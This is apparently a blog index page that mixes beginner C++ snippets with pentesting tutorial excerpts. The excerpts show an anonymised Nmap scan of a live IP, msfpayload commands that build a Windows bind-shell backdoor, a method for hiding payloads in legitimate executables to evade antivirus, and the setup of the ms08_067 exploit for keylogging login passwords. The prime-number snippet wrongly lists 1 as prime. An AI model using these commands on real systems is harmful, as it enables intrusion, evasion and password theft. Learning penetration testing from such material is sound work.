Posted on 20-02-2011
Filed Under (C++, programming) by admin

Finding whether a word or number is a palindrome is very common in programming languages. A palindrome word or number is one that reads the same in either direction. Words: bob, boob, ana… Numbers: 1, 2, 33, 121, 222, 3445443.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <iostream>
#include <string>
using namespace std;
//finding palindromes
int main()
{
	cout << "Enter word or number: ";
	string temp, input; cin >> input;
	temp = input;
 
	reverse(input.begin(), input.end());//reversing input
	if(temp == input) { cout << temp << " is a palindrome!" << endl; } //checking for palin
	else { cout << temp << " is not a palindrome!" << endl; }
 
	system("pause");
	return 0;
}

Comments Off    Read More   
Posted on 20-02-2011
Filed Under (C++, programming) by admin

Finding the minimum and maximum in an array is a classical programming exercise in C++. Here’s how is done!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <iostream>
using namespace std;
//finding min and max in array
int main()
{
	int num[5] = { 2, 50, 100, 25, 78 };
	int max = num[0], min = num[0]; //set max & min to some value
	for(int i = 0; i < 5; i++)//loop through array
	{
		if(num[i] > max) { max = num[i]; } //find max
		if(num[i] < min) { min = num[i]; } //find min
	}
	cout << "Maximum number: " << max << endl;
	cout << "Minimum number: " << min << endl;
 
	system("pause");
	return 0;
}

Comments Off    Read More   
Posted on 16-02-2011
Filed Under (C++, programming) by admin

A Prime number can only be divided by one and itself. For example; 13 can only be divided by 1 and 13. Here’s a C++ code that prints out the all prime numbers between 0 and 100.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bool isPrime=true;
int num = 100;
 
for ( int i = 0; i <= num; i++)
{ 
	for ( int j = 2; j <= num; j++)
	{ 
		if ( i!=j && i % j == 0 )
		{ 
			isPrime=false;
			break;
		}
	}
	if (isPrime)
	{
		cout <<"Prime:"<< i << endl;
	}
 
	isPrime=true;
}

Comments Off    Read More   

In order to achieve complete anonymity while scanning a host, proxychains is as good as it gets because it uses Tor and Privoxy to tunnel the Nmap scan. In other words, you feed an application to proxychains, in this case Nmap, and it uses Tor for the scan. ProxyChains allows you to use SSH, Telnet, VNC, FTP and other network application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers. Proxychains allows TCP and DNS tunneling through proxies. Be aware that Proxychains only tunnels TCP and DNS; in other words, avoid using UDP and host discovering through ICMP (ping). The options for these are “-n” telling nmap to not resolve hostname, and “-PN” telling nmap not to ping the host. Also, the Tor network is slow, so be patient! I’m doing this in Backtrack; therefore, I will not go over the installation of Nmap, Proxychains, and Tor because they are all there. But you may want to check the proxychains.conf file and make sure you have this settings.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

The “-sTV” options tells nmap to do a full TCP connect and Version Detection, “-PN” tells nmap not to ping the remote host, “-n” not to resolve any dns records, and finally, “-p” options for the ports.

root@bt:~# proxychains  nmap -sTV -PN -n -p21,22,25,80 64.13.134.52
ProxyChains-3.1 (http://proxychains.sf.net)
 
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-03 20:12 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:25-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:21-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-64.13.134.52:80-<><>-OK
Nmap scan report for 64.13.134.52
Host is up (12s latency).
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
22/tcp open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp closed smtp
80/tcp open   http    Apache httpd 2.2.3 ((CentOS))
 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds

Comments Off    Read More   

There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and with a few registry hacks the backdoor runs when the user login, allowing for shell access; however, there are a few drawbacks with this method. First, it requires to edit the registry and creating new keys (lengthy process). Second, upon the user login you can see netcat running for a split second and closing. It doesn’t take a savvy user to know something is up. And third, is an unauthenticated backdoor, which means is open for anyone. The two approaches I’m taking here are also unauthenticated which is not recommended, but sometimes that is the only choice, and what is more important, they are already built into metasploit.
The first method is the payload “shell_bind_tcp” which is the equibalent of netcat, but without having to do any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we got a meterpreter session going.

First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections. Read the rest of this entry »

Comments Off    Read More   
Posted on 24-09-2010
Filed Under (metasploit, pentesting, security) by admin

One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode “-x” option allows you to select a profile, which could be a legit executable like: putty, calc, notepad, etc, to embed your payload, and; therefore, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”…. why? Well, a stager is a small piece of code that allocates in memory, open network port to communicate with the framework, and then it downloads the rest of the payload. A stager is very small. It’s because of its size that antivirus have a hard time detecting it. However, a full payload has everything needed to execute. So first we will create an executable using a single payload, and put it through AV scans.
NOTE: every time you see “&gt;” inside the scripts, it’s “>”

msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe

Now, let’s put it through AV scans, and….

Read the rest of this entry »

Comments Off    Read More   
Posted on 12-09-2010
Filed Under (pentesting, security) by admin

So you got a meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from meterpreter, specially if your session is not running as user with admin privileges. So how could you get the remote user password? Well, Metasploit has a script called “keylogrecorder,” which has an option to logoff the user, and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.

msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...
 
Exploits
========
 
   Name                         Rank    Description
   ----                         ----    -----------
   windows/smb/ms03_049_netapi  good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi  great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc  normal  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi  great   Microsoft Server Service Relative Path Stack Corruption
 
msf> use exploit/windows/smb/ms08_067_netapi

2- now we need to set the options for this exploit.

msf exploit(ms08_067_netapi)> show options
 
Module options:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic Targeting
 
msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105
RHOST => 172.16.10.105

Read the rest of this entry »

Comments Off    Read More